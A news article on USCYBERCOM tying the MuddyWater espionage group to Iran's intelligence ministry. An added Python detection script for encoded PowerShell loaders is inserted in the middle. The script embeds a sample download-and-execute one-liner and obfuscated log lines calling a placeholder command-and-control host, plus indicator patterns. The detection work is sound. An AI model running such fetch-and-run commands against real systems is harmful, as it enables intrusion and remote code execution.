
The U.S. Cyber Command (USCYBERCOM) on Wednesday officially confirmed MuddyWater’s ties to the Iranian intelligence apparatus, while simultaneously detailing the various tools and tactics adopted by the espionage actor to burrow into victim networks.

“MuddyWater has been seen using a variety of techniques to maintain access to victim networks,” USCYBERCOM’s Cyber National Mission Force (CNMF) said in a statement. “These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.”
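The two techniques USCYBERCOM names, DLL side-loading and obfuscated PowerShell, are what a detection engineer hunts for in endpoint telemetry. The Python below is an added example and is not part of the article or of any USCYBERCOM release; it shows the PowerShell half: it decodes `-EncodedCommand` payloads found in process-creation log lines and scores each command line against indicators common to PowerShell loaders. The log format, hostnames, sample scripts, indicator list and the flag threshold of two indicators are all constructed assumptions for this example, not values from the page.

```python
import base64
import re

# Constructed staging script used only to build the sample log below; this is
# not a real MuddyWater payload and the host name is a reserved placeholder.
STAGE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage')"

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
# but not -ep / -ex, which belong to -ExecutionPolicy; the payload is base64 text.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")

# Indicators that commonly appear in obfuscated PowerShell loaders (assumed list);
# each name is reported when its pattern matches the command line or decoded script.
INDICATORS = {
    "invoke_expression": re.compile(r"(?i)\biex\b|invoke-expression"),
    "web_download": re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"),
    "base64_layer": re.compile(r"(?i)frombase64string"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no_profile": re.compile(r"(?i)-nop\b|-noprofile"),
    "policy_bypass": re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"),
    "char_obfuscation": re.compile(r"(?i)\[char\]\s*\d+"),
}

# Constructed log format: <timestamp> <host> ProcessCreate cmdline="..."
LOG_RE = re.compile(r'^(?P<ts>\S+)\s+(?P<host>\S+)\s+ProcessCreate\s+cmdline="(?P<cmd>.*)"\s*$')


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE bytes, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str):
    """Reverse encode_powershell; return None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def analyze_cmdline(cmdline: str) -> dict:
    """Score one PowerShell command line, looking inside any -EncodedCommand payload."""
    decoded = None
    hits = []
    m = ENC_FLAG.search(cmdline)
    if m:
        hits.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
    searchable = cmdline if decoded is None else cmdline + "\n" + decoded
    hits.extend(sorted(name for name, rx in INDICATORS.items() if rx.search(searchable)))
    return {"decoded": decoded, "indicators": hits, "score": len(hits)}


def scan_logs(lines, threshold: int = 2):
    """Return a finding for every ProcessCreate line whose indicator count reaches the threshold."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        result = analyze_cmdline(m.group("cmd"))
        if result["score"] >= threshold:
            findings.append({"host": m.group("host"), **result})
    return findings


# Constructed sample log lines: one routine scheduled task, one encoded loader,
# and one loader that hides its strings with [char] arithmetic instead of base64.
SAMPLE_LOGS = [
    '2024-03-01T09:15:02Z ws-03 ProcessCreate cmdline="powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"',
    '2024-03-01T09:16:40Z ws-07 ProcessCreate cmdline="powershell.exe -w hidden -nop -enc '
    + encode_powershell(STAGE_SCRIPT) + '"',
    '2024-03-01T09:17:11Z ws-11 ProcessCreate cmdline="powershell.exe -ep bypass -c $u=[char]104+[char]116;iwr http://c2.example.invalid/x"',
]

if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f["host"], f["score"], f["indicators"])
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Running it flags the two loader lines and leaves the `-NoProfile` scheduled task alone, since a single indicator is routine on most fleets; the decoded script is returned so it can be fed to whatever deeper analysis the SOC already runs. The DLL side-loading half needs image-load telemetry rather than command lines (a signed binary loading a DLL from a user-writable directory) and is not covered by this block.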

The agency characterized the hacking efforts as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), corroborating earlier reports about the nation-state actor’s provenance.

Also tracked under the monikers Static Kitten, Seedworm, Mercury and TEMP.Zagros, MuddyWater is known for attacks directed primarily against a wide gamut of entities in the government, academic, cryptocurrency, telecommunications, and oil sectors in the Middle East. The group is believed to have been active since at least 2017.

Recent intrusions mounted by the adversary have involved exploiting the ZeroLogon (CVE-2020-1472) vulnerability as well as leveraging remote desktop management tools such as ScreenConnect and Remote Utilities to deploy custom backdoors that could enable the attackers to gain unauthorized access to sensitive data.
